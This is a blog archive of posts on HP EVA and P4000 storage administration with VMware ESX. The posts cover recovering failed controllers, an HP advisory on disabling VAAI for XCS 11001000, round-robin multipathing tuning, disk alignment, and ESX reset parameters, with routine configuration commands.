Entries Tagged as 'Storageworks'

E.H.B.O. for EVA… What NOT to do!

  1. Check your environment (in my case: an EVA4400 with a fair amount of data on it, both controllers failed, system down).
  2. DO NOT (I repeat) DO NOT TOUCH the EVA. (Leave all disks as they are.)
  3. In my case HP was called by the customer.
  4. Go to the field-service page (that is still on the original CVE port).
  5. Go to the command line.
  6. Enter the commands given by HP support. (I will not mention them, but I know them.) At the time I went into the field-service page the EVA was gone from the CVE and sat in the Uninitialized part of the Service tab. The situation was that 5 disks had failed within 1 day, probably 2 in the same RSS at the same time.
  7. Reseat the faulty disks.
  8. Again run the command within field-service and restart the CVE service.
  9. There your EVA is back again.

EVA back from the dead or from a short coma?

Whatever the case: if you have 1 (ONE) problem, do NOT pull, replace or touch anything on the EVA until you know you should. You are likely to introduce more problems than you can handle.

HP 4400/6400/8400 Enterprise Virtual Array and HP EVA P6000 Storage controller software version XCS 11001000 Inactive

After working at a customer site and running into a problem expanding an EVA6400 (a SPOF on a disk, so the I/O controllers would not code load), I heard from HP support that there is a new XCS code for the EVA x400 series and the P6000 range.

Below is HP document ID: c03571575

Release Date: 2012-11-13
Last Updated: 2012-11-13

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03571575&lang=en&cc=us&taskId=101&prodSeriesId=3664763&prodTypeId=12169

DESCRIPTION

A critical issue has been discovered that can potentially occur on HP Enterprise Virtual Array (EVA) 4400/6400/8400 and HP EVA P63x0/P65x0 systems running controller software version XCS 11001000. The potential for this issue exists only on systems running software version XCS 11001000 that have VAAI functionality enabled on VMware ESX 4.1/ESX 5.x hosts.

NOTE: Version 11001000 is the only active XCS controller software with this issue; however, the potential for this issue also exists in the inactive XCS versions 10100000 and 11000000.

To ensure current and future systems will function as expected with VAAI enabled, XCS controller software version 11001000 is being retired and will be listed as Inactive in the HP controller software support matrix. Contact your HP Services representative for more information on the issue and to schedule an upgrade to the latest controller software that resolves this issue.

SCOPE

This issue affects HP EVA4400/6400/8400 and HP EVA P63x0/P65x0 arrays that are running XCS 11001000.

RESOLUTION

Contact your HP Services representative for more information on the issue and to schedule an upgrade to XCS version 11001100. The VAAI functionality must be immediately disabled until the controller software is upgraded to 11001100.

WORKAROUND

Disable VAAI functionality on all VMware hosts that access the HP EVA array until the controller software has been upgraded to XCS 11001100.
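A sketch of one way to do this on an ESXi 5.x host, switching off the three VAAI primitives through the advanced settings (on ESX 4.1 the same DataMover and VMFS3 options can be changed in the vSphere Client under Advanced Settings):

# Disable the three VAAI primitives (Full Copy, Block Zeroing, ATS locking)
esxcli system settings advanced set -o /DataMover/HardwareAcceleratedMove -i 0
esxcli system settings advanced set -o /DataMover/HardwareAcceleratedInit -i 0
esxcli system settings advanced set -o /VMFS3/HardwareAcceleratedLocking -i 0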

UPDATE 16-11-2012:

The XCS code can be found here -> https://h20392.www2.hp.com/portal/swdepot/displayProductsList.do?category=NAS

Best practices

HP Enterprise Virtual Array (EVA) family with VMware vSphere 4.0, 4.1 and 5.0 Best practices
[Download]

Running VMware vSphere 4 on HP LeftHand P4000 SAN Solutions
[Download]

Best Practices for deploying VMware and vSphere 4 with VMware High Availability and
Fault Tolerance on HP P4500 Multi-Site SAN cluster
[Download]

HP P4000 LeftHand Solutions with VMware vSphere Best Practices (incl. vSphere 5)
[Download]

3PAR Utility Storage with VMware vSphere
[Download]

HP P2000 Software Plug-in for VMware VAAI
[Download]

HP 3PAR Storage and VMware vSphere 5 best practices
[Download]

IOPS adjustments for ALUA-aware storage

Set all LUNs to Round-Robin by default:

esxcli storage nmp satp set --default-psp VMW_PSP_RR --satp VMW_SATP_ALUA

On all LUNs that are on Round-Robin, set the IOPS value to 1:

for i in `esxcli storage nmp device list | grep '^naa.600'` ;
do esxcli storage nmp psp roundrobin deviceconfig set -t iops -I 1 -d $i; done
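To verify the setting on a single device afterwards (<device> is a placeholder for an naa.600... identifier), the Path Selection Policy Device Config line in the output should show policy=iops with iops=1:

esxcli storage nmp device list -d <device>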

EVAPERF “Access to the host was NOT verified”

Sometimes I get this “nice” message from EVAperf when adding a new CV/EVA host to the access list:

c:\Program Files\Hewlett-Packard\EVA Performance Monitor>evaperf fnh 127.0.0.1 <username>
Access to the host was NOT verified
Host: 127.0.0.1 not added to the list

The same happens when changing 127.0.0.1 to localhost or to the IP address of the host.

It turns out that using the FQDN of the host fixes this issue.
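For example (the FQDN below is a hypothetical name; use the fully qualified name of your own CV host):

c:\Program Files\Hewlett-Packard\EVA Performance Monitor>evaperf fnh cvhost.mydomain.local <username>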

EVA VAAI compliant?

Questions that are thrown at me are:

Is the EVA VAAI compliant?
The EVA will become “vStorage APIs for Array Integration” (in short VAAI) compliant. It is NOT compliant at the moment.

Will it be in the next firmware release? Probably NOT.

The one after that… Probably YES. So we will have to wait, but until then the EVA should be fast enough on its own.

More information when available.
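In the meantime you can check from the host side what the ESX server itself reports. On ESX 4.1, where VAAI was introduced, the device listing shows a VAAI status per LUN (the egrep pattern is just one way to trim the output):

esxcfg-scsidevs -l | egrep 'Display Name:|VAAI Status:'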

A “Poor man’s SAN” for ESX vSphere with VSA

Just thinking about how to make a “Poor man’s SAN”, I came across this idea:

Take 2 servers with enough disk space available and the ability to expand when needed. Install ESXi vSphere on both systems. With this installed, create VMs on your ESX hosts with the VSA you can buy from HP.
The VSA is the same software that runs on the P4000 from HP, but now running inside your vSphere environment. The licenses go up to 10 TB.
By doing this on both ESX hosts you can set up your SAN/iQ management environment and also your (first) cluster.

Make sure you have enough managers running to keep your data available in case one of your ESX hosts dies.

Now you have created your own iSCSI “P4000”-like SAN. You can now connect to it from your production ESX vSphere environment.

One thing: support from HP is NOT included.
(drawing will follow)
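A minimal sketch of that last step on an ESXi 5.x host, connecting to the VSA cluster with the software iSCSI initiator (the adapter name vmhba33 and the cluster virtual IP 10.0.0.10 are assumptions for illustration):

# Enable the software iSCSI initiator
esxcli iscsi software set --enabled=true
# Point dynamic discovery at the SAN/iQ cluster virtual IP
esxcli iscsi adapter discovery sendtarget add -A vmhba33 -a 10.0.0.10:3260
# Rescan to pick up the volumes presented by the VSA cluster
esxcli storage core adapter rescan -A vmhba33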

VAAI support with SAN/iQ 9.0 on P4000

SAN/iQ for the P4000 now has support for the VMware VAAI vStorage offloads (Full Copy, Block Zeroing, and Hardware Assisted Locking) for faster VM deployment and less load on the ESX server.

Meaning more VMs can be run in the same environment. Until SAN/iQ 8.1 the recommendation was a total of 16 VMs; now up to 50 VMs should be supported. I have not been able to test this theory, but it is what HP states at this moment.

To upgrade to SAN/iQ 9.0 your system should already be running SAN/iQ 8.1.

Disk alignment

Disk alignment is very important in every operating system environment, but when you are using a SAN and also using VMware you should take disk alignment into account.

In the first situation the Guest OS (for example Windows) is not aligned with the VMFS and the VMFS is not aligned with the array blocks, meaning that 1 I/O can result in 3 I/Os on the storage device.

In the second situation the VMFS has been aligned, but the Guest OS still is not. Now one I/O can result in 2 I/Os on the storage device. Better, but performance can still be improved.

In the third situation all file systems are aligned. One I/O results in 1 I/O, because all block boundaries start at the same position.

Windows Vista and Windows 2008 create aligned partitions by default; only on Windows XP do you need a trick to avoid this:
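A sketch of that trick using diskpart, assuming a version that supports the align parameter (shipped with Windows Server 2003 SP1 and later; the disk number, drive letter and 1024 KB offset are examples):

diskpart
DISKPART> select disk 1
DISKPART> create partition primary align=1024
DISKPART> assign letter=E
DISKPART> exit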

UseLunReset and UseDeviceReset VMware


If you are using a SAN-attached ESX environment, make sure:
Disk.UseLunReset is set to 1 (default = 1)
Disk.UseDeviceReset is set to 0 (default = 1).

The reason to disable the Disk.UseDeviceReset parameter is that it does a complete SCSI bus reset. All SCSI reservations will be cleared, not for a specific LUN but for the complete device (being the whole SAN controller).

This could disrupt your SAN fabric. I would suggest setting the ESX host in maintenance mode and rebooting it afterwards.

Alternatively, you can also set this via the Service Console by issuing the following commands:

esxcfg-advcfg -s 1 /Disk/UseLunReset
esxcfg-advcfg -s 0 /Disk/UseDeviceReset
service mgmt-vmware restart
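To read the values back afterwards, the same tool supports -g:

esxcfg-advcfg -g /Disk/UseLunReset
esxcfg-advcfg -g /Disk/UseDeviceReset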
